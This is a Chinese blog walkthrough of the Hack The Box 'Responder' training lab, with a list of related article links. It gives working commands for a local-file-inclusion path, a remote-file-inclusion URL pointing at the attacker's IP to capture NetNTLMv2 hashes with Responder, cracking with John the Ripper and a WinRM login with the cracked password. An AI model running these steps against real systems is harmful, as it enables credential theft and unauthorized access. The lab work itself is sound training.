Hack The Box Starting Point 渗透测试入门靶场 TIER 1 - Responder

最新推荐文章于 2024-04-05 17:10:56 发布
最新推荐文章于 2024-04-05 17:10:56 发布
阅读量1.1k 收藏 6
点赞数
文章标签: 安全 web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42445757/article/details/124281639
版权

涉及到SMB,枚举,Apache和WinRM(WinRM是Windows Remote Managementd(win远程管理)的简称。基于Web服务管理(WS-Management)标准,使用80或443端口。这样我们就可以在对方有设置防火墙的情况下远程管理这台服务器)
在这里插入图片描述

先看一下旁边的Walkthough,看看本靶场的要求
本实验重点介绍如何利用 Windows 机器上提供的网页上的文件包含漏洞来收集运行 Web 服务器的用户的 NetNTLMv2 质询。我们将使用一个名为 Responder 的实用程序来捕获 NetNTLMv2 哈希,然后使用一个称为 john the ripper 的实用程序来测试数百万个潜在密码,看看它们是否与用于创建哈希的密码匹配。我们还将深入研究 NTLM 身份验证的工作过程以及响应程序实用程序如何捕获挑战。
TASK 1,开放了多少TCP端口?答案是3。
在这里插入图片描述

使用nmap扫描,-p-:所有端口,-min-rate:最低速率
nmap -v -p- -min-rate 3000 -sV -sC 10.129.203.29,扫出了80,5980和7680端口。
在这里插入图片描述

TASK 2,使用 IP 地址访问 Web 服务时,我们被重定向到的域是什么?unika.htb
在这里插入图片描述

我们直接访问ip会显示无法建立到unika.htb服务器的链接
在这里插入图片描述

我们使用echo命令绑定一下host(tee命令用于读取标准输入的数据,将内容输出成文件,-a/–append:附加到既有文件的后面,而非覆盖它)
echo “10.129.203.29 unika.htb” | sudo tee -a /etc/hosts
在这里插入图片描述

TASK 3,服务器上哪种脚本语言被用来生成网页?php
在这里插入图片描述

TASK 4,用于加载不同语言版本网页的 URL 参数的名称是什么?page
在这里插入图片描述

当我们将语言改为FR的时候,URL参数为page=french.html
在这里插入图片描述

TASK 5,哪个page参数的值可能存在本地文件包含(LFI),这里很明显本地文件包含是…/…/…/…/…/…/…/…/windows/system32/drivers/etc/hosts
在这里插入图片描述

目前已知的参数只有page,用page测一下是否存在文件包含,这里就爆出了/etc/hosts的内容
在这里插入图片描述

TASK 6,远程文件包含(RFI)是哪个?答案是//10.10.14.6/somefile,远程包含目标IP下的文件。
在这里插入图片描述

TASK 7,NTLM是什么?NTLM(New Technology Lan Manager),NTLM是一种基于挑战(challenge)/响应(response)消息交互模式的认证过程。
在这里插入图片描述

TASK 8,使用Responder去指定网络接口。kali自带的responder,–help查看使用,这里可以看到-I是指定网络接口。
在这里插入图片描述
在这里插入图片描述
使用responder创建一个恶意的SMB服务器,当目标机器尝试对该服务器执行 NTLM 身份验证时,响应程序会向服务器发送回一个质询,以使用用户密码进行加密。当服务器响应时,Responder 将使用质询和加密响应来生成 NetNTLMv2。虽然我们无法逆向 NetNTLMv2,但我们可以尝试许多不同的常用密码,看看是否有任何生成相同的质询响应,如果找到,我们就知道那是密码(可以使用Jhon the Ripper工具)。
sudo responder -I tun0
在这里插入图片描述

浏览器通过page远程包含,访问我们tun0网卡,
http://unika.htb/index.php?page=//10.10.16.133/somefile,捕获到对应的hash值
在这里插入图片描述

TASK 9,有几种工具可以接受 NetNTLMv2 质询/响应并尝试数百万个密码,以查看其中是否有任何一个生成相同的响应。 一种这样的工具通常被称为“john”,但全名是什么?John the Ripper
在这里插入图片描述

TASK 10,administrator的密码是什么?
在这里插入图片描述

使用John the Ripper破解
首先将刚才的Hash存到文件中,echo “hash” > hash.txt
破解john -w=/usr/share/wordlists/rockyou.txt hash.txt(-w:使用字典)
得到administrator密码badminton
在这里插入图片描述

TASK 11,我们将使用 Windows 服务使用我们恢复的密码远程访问 Responder 机器。它侦听的 TCP 端口是什么?5985端口。
在这里插入图片描述

再来看一下我们nmap扫描到的端口
在这里插入图片描述

最后来获取flag,我们将连接到目标上的 WinRM 服务并尝试获取会话(默认情况下Linux没有安装PowerShell)。
-i:指定ip,-u:指定用户名,-p:指定密码
evil-winrm -i 10.129.203.29 -u administrator -p badminton
进入shell
在这里插入图片描述

在C:\Users\mike\Desktop下找到了flag,用type命令打印出来。
在这里插入图片描述

D4vid
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
内网渗透Responder攻防(上)1
08-08
内网渗透Responder攻防(上)1
内网渗透Responder演练(下)
xnxqwzy的博客
08-23 133
NTLM中继攻击已经被发现十多年了,要实现NTLM中继攻击,也需要先进行LLMNR/NBNS欺骗,这样,攻击机器就可以充当了中间人,本质上还是由于NTLM认证机制所导致的,且对于最新的NTLMv2认证任然有效,但这个过程并不是没有限制,对于工作组的机器来说,两台机器的密码需要一致才能成功,对于域用户来说,被欺骗用户(发起请求的用户)需要域管理员组里边的用户才可以,NTLM中继成功后的权限为被欺骗用户的权限。这是一个争议比较大的问题,有的人会建议先学编程,而有的人会建议先学计算机基础,其实这都是要学的。
[StartingPoint][Tier1]Responder
最新发布
04-05 953
WinRM Custom Applications Protocols XAMPP SMB Responder PHP Reconnaissance Password Cracking Hash Capture Remote File Inclusion Remote Code Execution
HackTheBox靶场系列(一)之HackTheBox靶场简介
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
11-30 2890
Hack The Box是国外的一个网络安全在线平台,允许用户实践渗透测试技能,并与其他类似兴趣的成员交流想法和方法。它包含一些不断更新的挑战,其中有许多模拟真实场景的机器。HackTheBox靶场是一个虚拟的渗透测试训练平台,用于帮助安全研究人员、渗透测试人员和学生提高他们的技能。它包含一系列的虚拟机,其中每一个虚拟机都代表一个可攻击的目标系统。通过攻击这些虚拟机和解决它们的漏洞,用户可以提高自己的技能和知识,以更好地了解实际环境中的攻击和防御。
内网渗透-Responder捕获Win哈希
小刚的博客
08-03 3002
作者:小刚 一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢 本实验仅用于信息防御教学,切勿用于其它用途 Responder捕获Win哈希实验环境Responder安装ResponderResponder参数获取NTLMv2哈希 实验环境 VM搭建的虚拟测试环境 1.被攻击win7主机192.168.1.130 2.kali 192.168.1.131 3.win7配置 netsh advfirewall set allprofiles state off winrm quickconfig winr.
Hack The Box--Forest 靶场训练
kuileo的博客
05-10 1205
0x00 靶场介绍 Forest 是 Hackthebox 上一台 windows 靶机,主要考察域内相关知识。 ![在这里插入图片描述](https://img-blog.csdnimg.cn/5bd69afaa8cd4071aa9bf6dd94c47a31.png#pic_left 0x01 端口扫描 nmap扫描找出开放端口 ports=$(nmap -p- --min-rate=1000 -T4 10.10.10.161 | grep ^[0-9] | cut -d '/' -f 1 | tr '\
soloproject-tier1-website-template:Chingu Solo Project-Tier 1-网站模板
05-25
Chingu Solo Project-Tier 1-网站模板 概述 该项目通过克隆HTML / CSS / JS中的“征服”网站模板而没有Bootstrap,jQuery或其他库(例如Materialize),为您提供了制作Modern Looking Web应用程序的绝妙实践! 当您...
soloproject-tier1-chingu-trivia:Chingu Solo Project-Tier 1-Chingu Trivia
05-25
Chingu Solo Project-Tier 1-Chingu Trivia概述这个项目是开发干净现代的网页的绝好机会。 Trivia应用程序将跨层完成,而每一层都将复杂性提高到新的水平。 您目前在第1层存储库中。 您将负责对HTML , CSS和...
Data Center Site Infrastructure Tier Standard- Topology中文.pdf
04-14
该文档为Data Center Site Infrastructure Tier Standard- Topology的中文翻译,能够为数据中心设计者提供辅助和参考,适用于数据中心的建设者、设计者、运营者
Tier-1-Coding-in-JPEG2000-master.zip
11-22
JPEG2000 T1编码,MATLAB 找了很久才找到的
Tier-1-Load.py.zip_damage_damage plastic_elasto-plastic_plastic
09-24
Calculation of Damage elasto plastic constants MTS output
Hack the box -- Responder靶机
m0_64815693的博客
12-15 2303
Hack the back 靶场 Responder
不利用系统漏洞拿shell,kali强大工具Responder
qq_39815966的博客
10-17 1665
这是一种不用通过漏洞利用来获取权限的一种方法,使用的是kali的一个工具,叫Responder,主要是通过监听网络,有人如果访问了虚假的共享文件地址,就会获得该系统登录口令的哈希值,然后再通过脚本进行hash爆破就可以获取口令,再通过ipc建立空连接获得系统权限。 我们的第一步当然是获取该工具喽,非常的简单,只要从github上下载即可, 当然首先你先需要安装一下python环境和git工具 # apt-get intall build-essential git python-dev 然后是直接从git
Hack-The-Box-Responder
ffff5的博客
03-27 409
Hack The Box初级靶机Responder通关记录!
[HTB靶场记录]TIER-1(下)
Madess的博客
05-06 876
Crocodile + Rsponder
渗透师指南之Responder
热门推荐
大方子
06-30 1万+
总结与思考: 1. 利用Responder进行NTLMV2哈希的窃取 2. 使用Responder进行中继,攻击成功后进行代码执行 3. 使用Responder进行凭证/哈希破解 4. 使用Responder进行快速SMB扫描 5. 使用Responder配合MSF反弹shell 6. LLMNR/NBT-NS攻击的防御 概述: Responder是对渗透测试工作者来说一个很棒的工...
Hack the box-Responder
Ka_li12的博客
09-01 156
靶机地址: 10.129.125.204输入: Nmap -v -A -p- 10.129.125.204-v : 增加输出的详细程度-A: 一次扫描包含系统探测、版本探测、脚本扫描和跟踪扫描-p-: 扫描所有65535端口除此之外,可以使用man nmap查看nmap手册,里面有参数的详细解释也可以使用tldr nmap获取一些命令的使用例子扫描结果在fox浏览器中访问10.129.125.204网页跳转到了unika.htb,我们可以尝试修改hosts文件, 将靶机地址指向该域名输入: Vim /etc
responder简单用法
qq_44881113的博客
09-08 1369
Responder is an LLMNR, NBT-NS and MDNS poisoner. It will answer to specific NBT-NS (NetBIOS Name Service) queries based on their name suffix Responder 是一款可以在局域网模拟各种服务器的内网渗透神器 其可以在局域网中进行 DNS 欺骗、LLMNR 欺骗等,实现对用户 NTLM 口令的探测以及 DNS 钓鱼 同时其还可以模拟包括 FTP、HTTP 在内的多
Hackthebox靶场连接
weixin_47100211的博客
04-03 2977
关于注册账号 刚开始注册账号 注册账号需要科学上网之后才可以注册,否则点击注册后没有反应 另外在填写全名时需要在姓后面加空格否则不符合规范 例如: Zhang san 靶场会提供免费的机器来供参与者使用,VIP会有更多的功能和把靶场使用,并且有官方的靶场解析,每周会有新的靶场加入到免费的使用中。 使用靶场有两种方式,第一种是在线环境,但是免费用户只有2个小时的使用时间,我使用本地的第二种方法,用kali连接VPN使用靶场。 选择第一个靶场后下载VPN文件: 有两种方法可以连接,我选择的
汽车tier1和主机厂的区别
06-09
汽车 Tier1 企业和主机厂在汽车供应链中扮演着不同的角色。Tier1 企业通常是供应链中的一级供应商,他们向主机厂提供汽车零部件和系统。Tier1 企业通常专注于某个特定领域,例如发动机、底盘、电子系统等,他们负责设计、开发、制造和交付这些零部件和系统给主机厂。 而主机厂则是汽车生产的核心,他们负责整个汽车的设计、制造和销售。他们从 Tier1 企业购买各种零部件和系统,然后将它们集成到汽车中,并最终将汽车销售给消费者。主机厂也会进行自主研发,例如开发新的汽车平台、电动车技术等。 因此,Tier1 企业和主机厂的职责和角色不同,但他们之间密切合作,共同构建汽车供应链。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值